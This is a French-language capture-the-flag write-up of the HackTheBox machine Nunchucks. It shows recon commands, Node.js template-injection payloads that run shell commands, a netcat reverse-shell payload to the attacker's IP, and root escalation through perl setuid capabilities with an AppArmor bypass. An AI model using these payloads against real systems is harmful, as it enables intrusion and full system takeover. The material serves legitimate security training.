Nunchucks HackTheBox (writeup)

Skills:

NodeJS SSTI (Server Side Template Injection)
AppArmor Profile Bypass (Privilege Escalation)

Reconnaissance

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap : Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap :

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.11.122 -oG allPorts

Analyse des ports ouverts avec extractport : Utilisation de la fonction extractport pour afficher de manière synthétique les ports ouverts et les copier dans le presse-papiers.

Scan de la version des ports avec Nmap : Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80,443 10.10.11.122 -oN targeted

Pour résoudre les noms de domaine en adresses IP via DNS, on insère dans le fichier /etc/hosts le nom de domaine associé à son adresse IP

Port 443 - HTTPS

Nous trouvons un panneau de connexion, mais aucun identifiant connu.

Fuzzing des VHosts - Gobuster

Nous effectuons un fuzzing des sous-domaines pour identifier d'éventuels services cachés :

gobuster vhost -u https://nunchucks.htb/ --append-domain -w /usr/share/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 -k

Nous trouvons le sous-domaine store.nunchucks.htb.

Vulnérabilité SSTI (Node.js)

Nous remarquons une fonctionnalité permettant d'entrer un email pour s'abonner à une newsletter. La réponse du serveur affiche directement notre entrée, ce qui suggère une possible Server-Side Template Injection (SSTI).

Test de la vulnérabilité

Nous interceptons la requête avec Burp Suite et testons une SSTI classique :

{{9*9}}

Si la réponse affiche 81, alors l'application est vulnérable, ce qui est le cas ici.

Lecture de `/etc/passwd`

Nous utilisons le payload suivant pour afficher le contenu de /etc/passwd :

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\"))}}

Récupération de l'utilisateur courant

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('whoami')\")()}}

Nous obtenons david.

Reverse Shell via SSTI (Node.js)

Démarrage de l'écoute sur le port 4444 :

nc -nlvp 4444

Envoi du payload de reverse shell :

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 4444 >/tmp/f')\")()}}

Accès à la machine cible

Flag user.txt

Traitement de la terminal

script /dev/null -c bash
#contrôle Z

stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash
stty rows 44 columns 184

Élévation de privilègeS

Exploitation des Capabilities sur Perl

perl | GTFOBinsgtfobins.github.io

Nous listons les capabilities disponibles :

getcap -r / 2>/dev/null

Nous remarquons que perl dispose de permissions particulières.

Exécution d'une commande en tant que root

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "whoami";'

Nous obtenons root.

contournement d'AppArmor

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/bash -p";'

Un binaire /usr/bin/perl est restreint par AppArmor

Nous exploitons un bug connu d'AppArmor pour contourner la restriction en créant un script :

#!/usr/bin/perl
use POSIX qw(setuid);
POSIX::setuid(0);
exec "/bin/bash";

Flaf root.txt :)

Mis à jour il y a 1 an

hashtagReconnaissance

hashtagPort 443 - HTTPS

hashtagFuzzing des VHosts - Gobuster

hashtagVulnérabilité SSTI (Node.js)

hashtagTest de la vulnérabilité

hashtagLecture de /etc/passwd

hashtagRécupération de l'utilisateur courant

hashtagReverse Shell via SSTI (Node.js)

hashtagFlag user.txt

hashtagTraitement de la terminal

hashtagÉlévation de privilègeS

hashtagExploitation des Capabilities sur Perl

hashtagcontournement d'AppArmor

hashtagFlaf root.txt :)